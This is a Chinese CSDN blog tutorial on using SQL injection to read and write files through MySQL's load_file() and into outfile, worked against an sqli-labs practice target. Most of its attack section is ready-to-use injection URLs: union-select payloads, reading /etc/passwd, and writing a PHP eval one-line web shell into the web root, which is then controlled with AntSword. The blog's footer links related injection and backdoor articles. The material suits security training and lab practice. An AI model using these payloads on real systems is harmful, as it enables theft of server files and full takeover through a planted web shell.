4 读写文件_WEB安全之SQL注入(4)——读写文件

最新推荐文章于 2022-11-25 18:34:15 发布
最新推荐文章于 2022-11-25 18:34:15 发布
阅读量97 收藏
点赞数
文章标签: 4 读写文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28787725/article/details/112663671
版权

大家好,我是阿里斯,一名IT行业小白。今天为大家分享的内容是利用注入进行文件的读写,这里主要是两个函数,load_file() 和into outfile 希望能帮助小白,也能帮助已经遗忘的你。

load_file()和into outfile使用前提

  • 有读/写权限

  • 有绝对路径

  • secure_file_priv 的值不为null

  • 注入时需要能够使用select语句

  • 引号能否使用

数据库测试

使用load_file读取D盘的3.txt文件

0cda08336867269ee1f4a607c3aaf91a.png

使用into outfile 写入文件4.txt到D盘

3dbab59f7f31634ac725ecc0e1d911c9.png

那么为什么我能使用这俩个函数呢?因为我在配置文件中设置了secure_file_priv ,如果你想在本地测试,加入该选项后注意重启mysql服务

ff4a66eddb7eff7d430941aa05c9e49e.png

线上靶机测试

load_file()

测试注入点 | 经过测试存在字符型注入

http://www.anantest.com:8080/sqlilabs/Less-1/?id=1' and 1=1--+

判断查询字段数

http://www.anantest.com:8080/sqlilabs/Less-1/?id=1' order by 3 --+

09a8cb73c1a8113fa5f802ed87342a16.png

判断显示位

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,2,3 --+

dd2a127df5ef4c1b784ec2ea00a808e4.png

进行文件读取 

因为系统时centos,所以可以试试/etc/passwd文件,成功读取到配置文件

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,load_file('/etc/passwd'),3 --+

2e0d6692abdb804fb77cc1c102fe3e8a.png

into ouftile写内容

直接利用上面测试的结果使用into outfile进行测试

第一次写入时,页面会回显错误,其实已经写入成功,可以使用菜刀或者蚁剑连接一下试试

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,('<?php  @eval($_REQUEST["hack"])?>'),3  into outfile "/var/www/html/ma.php"--+

蚁剑连接刚刚写入的一句话木马

f7805c6cd9d2b3001f106cf1a096cd9d.png

成功控制测试机

0f8e249455dd6597f620f6a481efb21a.png

e805c87537ea39f778e1930a80282953.png

有见Finsight
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7034
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
web渗透-SQL注入文件操作
豆豆不在了
03-01 997
SQL文件操作原理 在判定数据库连接权限的条件下,利用SQL操作函数 SELECT LOAD_FILE('E://test.txt') #下载文件 or SELECT 'nihao' INTO OUTFILE 'E://test1.txt' #上传写入文件 语句对网站服务器进行本地文件操作。 一般只有root连接用户才能进行文件操作。 攻击步骤: 1.获
ctf题记录之SQL注入
qq_41814777的博客
09-28 796
sql注入文件上传 这是一道XCTF平台上的upload题,我没有想到它是个sql注入 http://111.198.29.45:46096/ 0x01 打开链接是一个登陆界面,不管三七二十一先注册登陆,是一个文件上传的页面,任意上传文件,发现只能传jpg才能记录下来。好像其他的都被过滤掉了。 0x02 值得注意的是我们上传的文件名都会显示到页面上,这个过程可能是经过数据库查询的,我们上传的文...
sql注入之——读写文件,带外攻击
wsnbbz的博客
02-10 1560
1.开启读文件权限 在my.ini加上secure_file_priv= secure_file_priv=代表对文件读写没有限制 secure_file_priv=NULL代表不能进行文件读写 secure_file_priv=d:/…代表只能对改路径下文件进行读写 2.读文件: 函数: load_file(); 语句: ?id=-1 union select 1,load_file(“d:\...
SQL注入文件写入(需要用户验证)
热门推荐
隐0士的博客
11-14 1万+
SQL注入文件写入(需要用户验证)解决方案说明 这个问题根据使用的数据库而有两种处理方案:数据库不为sqlserver 此问题是针对sql server数据库做文件写入的攻击而产生的,如果使用的数据库不是sql server则可不必理会,可在appscan的扫描配置–>测试策略–>SQL注入–>SQL注入文件写入(需要用户验证)两个选项前面去掉打勾,这样appscan便不会做这样的扫描攻击,如下
PHP文件数据类网站实例开发源码——和其MySQL备份.rar
10-24
在实际的网站开发中,还需要考虑安全性问题,如防止SQL注入,这可以通过预处理语句或者使用PDO(PHP Data Objects)扩展来实现。另外,为了优化性能,需要了解索引的创建和使用,以及适当的数据库设计原则。 对于...
基于ASP.NET的停车场管理系统_WEB管理系统_SQLServer数据库应用.rar
04-26
此外,系统还可能涉及安全性方面的考虑,如用户身份验证和授权,防止SQL注入攻击,以及数据加密等措施,确保用户信息的安全。同时,为了提高系统的可扩展性和维护性,可能会采用MVC(Model-View-Controller)架构,...
ASP.NET实例开发源码——HTTPCommander网文件经理源码.zip
11-24
4. **文件系统访问**:学习如何使用C#的System.IO命名空间来安全读写、操作文件和目录,以及如何实现文件上传和下载功能。 5. **用户认证与授权**:HTTPCommander可能包含用户登录和权限管理功能,这涉及ASP.NET...
PHP文件数据类网站实例开发源码——文件管理器(PHP).zip
10-24
- 文件管理器需要防止常见的Web攻击,如SQL注入和跨站脚本攻击(XSS)。这可能通过使用预处理语句、过滤用户输入、限制文件类型上传等方式实现。 - 文件路径和命名也需谨慎处理,防止路径遍历漏洞。 7. 用户认证...
PHP实例开发源码——PhpSpy 2008 WEB后门程序.zip
11-22
4. **文件操作**:后门可能涉及读写服务器上的文件,包括日志、配置文件等,因此需要理解PHP的文件I/O函数,如`file_get_contents()`、`file_put_contents()`等。 5. **网络通信**:PhpSpy可能通过网络发送或接收...
SQL注入文件读写
永远是少年
06-27 2217
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
sql 注入
qq_32265719的博客
10-24 162
MySQL 及 SQL 注入
KopWelkin的博客
10-09 276
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户
SQL注入
CXC8066的博客
09-06 156
1、查询数据语句 1 select * from users; 2 select user_id,first_name,last_name from users; 3 desc mysql.user //查看表结构 4 //条件查询 5 select user,password,host from mysql.user where user='root' 6...
登录验证之sql注入问题解决方案
moxiaomo0804的博客
05-08 1923
1.初始版本的sql注入问题 sql注入:是指把用户输入的参数作为sql语句的本身来执行 public class Demo_login { public static void main(String[] args) { System.out.println("请输入用户名:"); Scanner sc = new Scanner(System.in); String use...
sql注入之into outfile
ljj20020718的博客
11-25 2444
sql注入之into outfile
Sql注入文件读写操作
INK
05-05 993
sql文件读写
python获取文件读写位置_python学习——文件读写
最新发布
05-31
你可以使用文件对象的tell()方法获取文件读写位置,该方法返回当前文件指针的位置(也就是当前读取或写入位置)。 例如,以下代码打开一个文件并读取其中的一行,然后使用tell()方法获取当前读取位置: ``` with open('example.txt', 'r') as f: line = f.readline() print(line) print(f.tell()) ``` 输出结果将会是: ``` This is an example file. 30 ``` 其中第二行输出的数字 30 表示当前读取位置是文件的第 31 个字节(因为 Python 中的索引是从 0 开始的)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值